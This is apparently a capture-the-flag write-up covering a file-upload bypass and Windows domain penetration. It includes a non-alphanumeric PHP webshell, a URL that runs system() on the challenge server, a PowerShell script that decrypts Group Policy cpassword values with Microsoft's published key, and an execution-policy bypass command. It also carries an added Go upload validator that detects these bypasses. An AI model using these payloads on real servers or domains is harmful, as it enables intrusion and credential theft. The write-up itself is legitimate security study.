Webshell without digits or letters
Upload bypass: a short tag plus P神's non-alphanumeric webshell is enough to get past the content filter, and the filename filter is bypassed by changing the case of the extension, since the target runs Windows.
exp
<?= $_=[] ?>
<?= $_=@"$_" ?>
<?= $_=$_[('!'=='@')] ?>
<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ = "_".$__ ?>
<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>
<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>
<?= ${$_______}["_"](${$_______}["__"]) ?>
Write a small shell:
http://47.113.219.76/uploads/d8ffd2952b7416f6096c2481dfad4351/6539886cfe4730b929fa714a800aa44a_6.Php?_=system&__=echo "<?php phpinfo()?>">>1.php
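The server-side fix is the mirror image of the two bypasses above: compare the extension case-insensitively (and look at every extension in the name), and inspect the content for PHP open tags, the short `<?=` tag included, rather than for keywords that a non-alphanumeric payload never contains. The Go upload check below is an added example and is not code from this writeup or from the challenge; the extension list, the 0.7 punctuation threshold and the sample inputs (the first three lines of the payload above, and a constructed JPEG header) are my own choices.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
	"unicode"
)

// Extensions a PHP handler would execute. Looked up in lower case so that
// "shell.Php" gets the same verdict as "shell.php"; the case-change bypass
// in the writeup relies on this normalisation being absent.
var executableExts = map[string]bool{
	".php": true, ".php3": true, ".php4": true, ".php5": true, ".php7": true,
	".phtml": true, ".phar": true, ".phps": true, ".pht": true,
}

// isExecutableName reports whether any extension in the name is executable,
// so both "x.Php" and "x.php.jpg" are rejected.
func isExecutableName(name string) bool {
	base := strings.ToLower(filepath.Base(name))
	for {
		ext := filepath.Ext(base)
		if ext == "" {
			return false
		}
		if executableExts[ext] {
			return true
		}
		base = strings.TrimSuffix(base, ext)
	}
}

// hasPHPOpenTag finds "<?php", the short echo tag "<?=" used above, or a bare
// "<?" (executable when short_open_tag is on); "<?xml" is left alone.
func hasPHPOpenTag(content []byte) bool {
	s := strings.ToLower(string(content))
	for {
		i := strings.Index(s, "<?")
		if i < 0 {
			return false
		}
		s = s[i+2:]
		if !strings.HasPrefix(s, "xml") {
			return true
		}
	}
}

// nonAlnumRatio is the share of non-whitespace characters that are neither
// letters nor digits. Ordinary PHP is mostly keywords and identifiers; the
// payload above is almost entirely punctuation, which is what lets it evade
// keyword filters and also what makes it stand out here.
func nonAlnumRatio(s string) float64 {
	total, punct := 0, 0
	for _, r := range s {
		if unicode.IsSpace(r) {
			continue
		}
		total++
		if !unicode.IsLetter(r) && !unicode.IsDigit(r) {
			punct++
		}
	}
	if total == 0 {
		return 0
	}
	return float64(punct) / float64(total)
}

// Verdict collects every reason an upload was refused.
type Verdict struct {
	Reject  bool
	Reasons []string
}

// CheckUpload applies the name and content checks to one uploaded file.
func CheckUpload(name string, content []byte) Verdict {
	var v Verdict
	if isExecutableName(name) {
		v.Reasons = append(v.Reasons, "executable extension (compared case-insensitively): "+name)
	}
	if hasPHPOpenTag(content) {
		v.Reasons = append(v.Reasons, "PHP open tag in content")
		if r := nonAlnumRatio(string(content)); r > 0.7 {
			v.Reasons = append(v.Reasons, fmt.Sprintf("%.0f%% of the code is punctuation: non-alphanumeric webshell pattern", r*100))
		}
	}
	v.Reject = len(v.Reasons) > 0
	return v
}

func main() {
	// Constructed samples: the first lines of the payload above under the case-changed name, and a JPEG header.
	payload := []byte("<?= $_=[] ?>\n<?= $_=@\"$_\" ?>\n<?= $_=$_[('!'=='@')] ?>\n")
	fmt.Printf("6.Php: %+v\n", CheckUpload("6.Php", payload))
	fmt.Printf("photo.jpg: %+v\n", CheckUpload("photo.jpg", []byte("\xff\xd8\xff\xe0 JFIF")))
}
```

The extension check deliberately walks every dotted suffix so that double extensions are caught too, and the content check keys on the open tag rather than on function names, because the payload above contains no function name at all.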
Domain penetration
After uploading cmd.exe and running net user, a hint pointed to \\192.168.0.12\Hint
It contained an archive with hints for flag1 and flag2.
Recovering passwords stored in Group Policy from SYSVOL
Reference: 3gstudent's 域渗透——利用SYSVOL还原组策略中保存的密码 (Domain penetration: using SYSVOL to recover passwords stored in Group Policy).
In a domain there is a default share path:
\\<DOMAIN>\SYSVOL\<DOMAIN>\
The domain name can be read from ipconfig /all:
Open the following path directly
//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/
Locate the configuration file under the matching policy GUID, in this case the Groups.xml at
//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/
In short: the \SYSVOL path stores some configuration for domain users -> find the configuration of the HintZip_Pass user -> it holds that account's logon password encrypted with AES-256, and since Microsoft has published the key, the password can be recovered -> finally use it to extract the archive. The cpassword below is the encrypted value.
Decryption script
function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword
    )
    try {
        # Append appropriate padding based on string length: GPP strips the '=' padding
        # from the base64 value. A length of 1 mod 4 can never be valid base64, so that
        # case drops the stray trailing character instead.
        $Mod = ($Cpassword.length % 4)
        switch ($Mod) {
            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
            '2' {$Cpassword += ('=' * (4 - $Mod))}
            '3' {$Cpassword += ('=' * (4 - $Mod))}
        }
        $Base64Decoded = [Convert]::FromBase64String($Cpassword)
        # Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        # The fixed AES-256 key Microsoft published for GPP cpassword values
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
        # Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length)
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor()
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
        # The decrypted plaintext is UTF-16LE
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    catch {Write-Error $Error[0]}
}

# The cpassword value taken from the Groups.xml found above
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"
Run:
powershell -executionpolicy bypass -file 1.ps1
The archive password is: zL1PpP@sSwO3d
Flag obtained: